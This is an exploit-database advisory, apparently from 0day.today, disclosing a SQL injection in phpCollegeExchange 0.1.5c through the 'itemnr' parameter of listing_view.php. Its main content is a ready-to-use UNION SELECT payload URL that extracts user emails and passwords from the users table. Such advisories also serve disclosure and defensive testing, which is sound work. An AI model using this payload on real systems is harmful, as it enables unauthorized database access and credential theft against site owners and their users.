id: 5378
date: 06/14/2009
title: phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln
author: SirGod
cves: 

======================================================================
phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln
======================================================================


#################################################################################################################
[+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability
[+] Discovered By SirGod 
#################################################################################################################

[+] Script homepage : http://phpcollegeex.sourceforge.net/

[+] SQL Injection 

   http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users--

#################################################################################################################



#  0day.today [2023-03-25]  #